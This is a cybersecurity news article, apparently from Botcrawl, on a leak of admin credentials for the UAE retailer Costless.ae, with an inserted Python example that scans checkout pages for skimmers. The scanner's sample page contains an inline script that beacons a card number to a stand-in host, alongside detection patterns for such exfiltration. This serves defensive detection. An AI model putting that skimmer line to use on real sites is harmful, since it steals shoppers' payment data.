The Costless.ae data breach represents a critical and unfolding cybersecurity crisis affecting the e-commerce platform Costless in the United Arab Emirates. Threat actors on a dark web forum have leaked what appear to be administrative access credentials for the company’s backend system. This exposure effectively grants “God mode” control over the site’s entire infrastructure and customer data.
Unlike typical data leaks that involve stolen databases sold privately, this incident involves the public release of administrative credentials or a live vulnerability path. The leak has triggered a race among attackers to seize control of Costless.ae’s backend before the company can respond. Each minute of delay increases the likelihood of complete data theft, payment skimming, and long-term compromise.
Background
Costless.ae is a UAE-based online retail platform that handles thousands of customer transactions daily. The platform stores sensitive data, including user profiles, payment information, order histories, and credentials linked to delivery and billing systems.
The leaked credentials provide direct access to the administrative endpoint of the website, which is typically restricted to internal staff. Cybercrime analysts monitoring dark web activity confirmed that the leak was posted for free as part of a “clout” campaign. The post contained references to the “admin_” endpoint, along with instructions for exploiting it. This suggests that multiple actors are now attempting to use the leaked access to control or exfiltrate data from Costless.ae.
Key Cybersecurity Insights
This incident is active and ongoing. The Costless.ae data breach is not a hypothetical risk but a live exploitation event that could escalate into a full-scale data dump within hours. Threat researchers have outlined several immediate risks that the company and its users now face.
1. Total Administrative Compromise
The leaked credentials reportedly grant administrative privileges, effectively handing attackers unrestricted access to all backend systems. This level of control enables them to modify databases, download full user records, and alter site configurations without detection.
2. Real-Time Data Theft and Payment Skimming
Attackers are expected to deploy malicious JavaScript skimmers, also known as Magecart scripts, on the Costless checkout page. These scripts capture and exfiltrate customer credit card information in real time as users complete purchases. Simultaneously, other attackers may attempt to exfiltrate the company’s full user database containing names, phone numbers, email addresses, physical addresses, and hashed passwords.
3. Persistence Through Hidden Backdoors
Once an attacker gains access to the admin system, it is common to install hidden backdoors, webshells, or secondary accounts to maintain control even after patches or password resets. Without a complete system rebuild, the company could remain unknowingly compromised for months.
4. Regulatory and Compliance Failure
The exposure of administrative access constitutes a severe breach under the UAE’s Federal Decree-Law No. 45 of 2021 on the Protection of Personal Data (PDPL). Costless.ae is legally obligated to notify both the Telecommunications and Digital Government Regulatory Authority (TDRA) and the UAE Data Protection Office. Failure to report and remediate the incident promptly could lead to major penalties, business suspension, or criminal investigation.
What Happens Next
Experts believe this is now a “race against time.” Because the access credentials were made public, multiple attackers may already be attempting to exploit them simultaneously. The next expected steps include:
- Database Dump: A full extraction of all customer records for sale on underground forums.
- Credit Card Skimmer Injection: The placement of malicious scripts on the live checkout page to capture new payment details in real time.
- Persistent Access: Creation of secret administrative accounts and hidden code to ensure continued control after the company attempts remediation.
Each of these steps can happen within hours of credential disclosure, emphasizing the urgency of immediate containment and forensic investigation.
Mitigation Strategies
For Costless.ae (The Company)
- Immediate Endpoint Shutdown: Take the administrative endpoint completely offline and restrict access to internal, whitelisted IP addresses only.
- Activate Incident Response: Assume the attacker has already accessed backend systems. Launch a full investigation with an experienced digital forensics firm to identify changes, new accounts, or hidden code.
- Credential and Key Rotation: Change all administrative passwords, database credentials, and API keys across the platform. Enforce phishing-resistant MFA using FIDO2 or hardware security tokens.
- Malware and Skimmer Scan: Conduct a deep scan of all web application files and payment pages for injected JavaScript or webshells that may be transmitting live payment data.
- Regulatory Notification: Notify TDRA and the UAE Data Protection Office in accordance with the PDPL. Document all remediation efforts and retain forensic evidence for compliance reporting.
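As an illustration of the skimmer scan step above, the following added example (not code from the article or from Costless.ae) audits a checkout page's scripts against a host allowlist and a simple heuristic for inline code that reads card fields and sends data off-page. The sample page, the `.example` hosts, and the allowlist are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristic: inline code that reads card fields AND can send data off-page.
CARD_FIELD = re.compile(r"card|cvv|cvc|expiry", re.I)
SEND_CALL = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon|new Image|WebSocket", re.I)
# Constructed sample checkout page (hypothetical hosts on the reserved .example TLD).
SAMPLE = """<form><input name="card_number"></form>
<script src="/static/checkout.js"></script>
<script src="https://cdn.shop.example/lib.js"></script>
<script src="https://stats-collect.example/a.js"></script>
<script>navigator.sendBeacon('https://stats-collect.example/c',
  document.querySelector('[name=card_number]').value);</script>"""

class ScriptAudit(HTMLParser):
    """Collect external script URLs and inline script bodies from one page."""
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            self._in_script = not src
            (self.external if src else self.inline).append(src or "")

    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

def audit_page(html, allowed_hosts):
    """Flag scripts loaded from off-allowlist hosts or matching the skimmer heuristic."""
    parser = ScriptAudit()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname  # None for same-origin relative paths
        if host and host not in allowed_hosts:
            findings.append(("external-script", src))
    for body in parser.inline:
        if CARD_FIELD.search(body) and SEND_CALL.search(body):
            findings.append(("inline-card-exfil-pattern", body.strip()[:60]))
    return findings
```

A pattern match like this only surfaces candidates for review; obfuscated code will evade it, so it complements rather than replaces comparison of deployed files against a known-good release.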
For Costless.ae Customers
- Monitor Bank Accounts: Customers should immediately review recent transactions for unauthorized charges or anomalies.
- Be Cautious with Emails: Avoid clicking on emails or messages claiming to be from Costless.ae, especially those asking for payment verification or password resets.
- Reset Passwords: If you have an account on Costless.ae, change your password immediately and avoid reusing it on other platforms.
- Scan for Malware: Use a trusted security solution like Malwarebytes to ensure your device is not infected with malicious extensions or trojans that can capture payment data.
Broader Implications
This incident highlights a recurring pattern in modern e-commerce breaches where public leaks of admin credentials lead to immediate mass exploitation. The Costless.ae data breach underscores the importance of limiting administrative exposure and enforcing zero-trust architecture in online platforms that process financial data.
The attack also serves as a warning to regional businesses operating under the UAE PDPL. Organizations that manage sensitive customer data must ensure that administrative systems are isolated from public access and protected by strong authentication measures. Failing to do so places customer privacy and corporate survival at risk.
For ongoing updates and verified coverage of global data breaches and related cybersecurity news, follow Botcrawl’s reporting on emerging threats across the Middle East and beyond.
Sean Doyle
Sean is a tech author and security researcher with more than 20 years of experience in cybersecurity, privacy, malware analysis, analytics, and online marketing. He focuses on clear reporting, deep technical investigation, and practical guidance that helps readers stay safe in a fast-moving digital landscape. His work continues to appear in respected publications, including articles written for Private Internet Access. Through Botcrawl and his ongoing cybersecurity coverage, Sean provides trusted insights on data breaches, malware threats, and online safety for individuals and businesses worldwide.











